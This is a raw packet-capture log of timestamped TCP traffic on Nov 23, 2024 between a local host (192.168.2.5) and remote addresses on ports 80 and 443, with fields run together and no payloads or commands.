                                                                                                                                                                          Nov 23, 2024 19:01:40.089879036 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.090333939 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.090394974 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.090413094 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.090436935 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.091061115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.091104984 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.091133118 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.091149092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.091192007 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.263406038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.263673067 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.263751984 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.263820887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.263838053 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.263853073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.263876915 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.264408112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.264543056 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.264559031 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.264590979 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.264614105 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.265430927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265602112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265661955 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.265819073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265938044 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265954971 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265969992 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.265981913 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.266021013 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.266580105 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.266756058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.266772032 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.266804934 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.267565966 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.267580986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.267597914 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.267661095 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.268156052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.268315077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.268384933 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.268470049 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269215107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269234896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269251108 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269289017 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.269314051 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.269937038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269951105 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.269967079 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.270021915 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.270737886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.270936012 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.270952940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.270993948 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.271019936 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.271755934 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.271770954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.271785975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.271822929 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.272371054 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.272680044 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.272694111 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.272737980 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.272767067 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.273361921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273431063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273447037 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273487091 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.273647070 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273688078 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.273714066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273727894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.273781061 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.275476933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.275492907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.275507927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.275548935 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.276249886 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.276411057 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.276413918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.276431084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.276475906 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.277004004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277019024 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277034998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277070045 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.277705908 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277721882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277738094 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.277769089 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.277785063 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.278470993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.278616905 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.278633118 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.278676033 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.279382944 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279397964 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279416084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279442072 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.279479027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.279705048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279719114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279736042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.279757023 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.280505896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.280559063 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.280574083 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.280633926 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.281377077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.281436920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.281451941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.281510115 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.282182932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.282221079 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.282237053 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.282270908 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.282286882 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.283123016 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.283163071 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.283179045 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.283215046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.283904076 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.283967018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.283983946 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.284023046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.284044027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.284760952 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.284854889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.284869909 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.284900904 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.285605907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.285936117 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.285988092 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.286128044 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.286319017 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.286366940 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.286746025 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.286806107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.286822081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.286848068 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.286865950 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.287601948 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.287666082 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.287683010 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.287740946 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.288460970 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.288516045 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.288536072 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.288589954 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.289298058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.289335012 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.289350986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.289388895 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.290172100 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.290235996 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.290251017 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.290283918 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.290314913 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.290997982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291058064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291074038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291109085 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.291892052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291933060 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291949987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.291986942 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.292010069 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.292704105 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.292768002 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.292820930 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.375468969 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.377392054 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.377423048 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.377877951 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.377886057 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.418311119 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.420084000 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.420614004 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.420634031 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.421093941 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.421099901 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.421341896 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.421369076 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.421698093 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.421704054 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.464853048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.464912891 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.464927912 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.465013027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.465327024 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.465342999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.465359926 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.465384960 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.465408087 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.466020107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.466272116 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.466309071 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.466347933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.466365099 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.466402054 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.466960907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.466978073 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.467000008 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.467011929 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.467775106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.467802048 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.467817068 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.467818975 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.467852116 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.468537092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.468575001 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.468590021 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.468614101 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.469396114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.469464064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.469477892 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.469517946 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.469544888 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.470305920 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.470320940 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.470335960 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.470371008 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.471263885 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.471321106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.471335888 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.471374035 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.471396923 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.471966982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472016096 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472032070 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472071886 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.472826958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472846985 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472868919 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.472915888 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.473669052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.473716974 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.473732948 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.473772049 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.474555969 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.474581957 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.474596977 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.474627018 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.474658012 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.475373030 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.475415945 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.475430012 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.475459099 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.476222038 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.476279020 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.476294994 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.476315022 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.476341963 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.477102995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.477181911 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.477196932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.477225065 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.478018999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478080988 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478096962 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478122950 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.478140116 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.478776932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478838921 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478854895 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.478873968 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.479700089 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.479820967 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.479835987 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.479861975 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.479880095 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.480632067 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.480707884 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.480725050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.480748892 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.481410980 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.481458902 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.481475115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.481492996 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.481513977 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.482198954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.482256889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.482273102 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.482290030 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.483067036 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.483114004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.483129978 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.483154058 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.483174086 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.483897924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.483988047 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.484004974 CET8049738185.215.113.16192.168.2.5
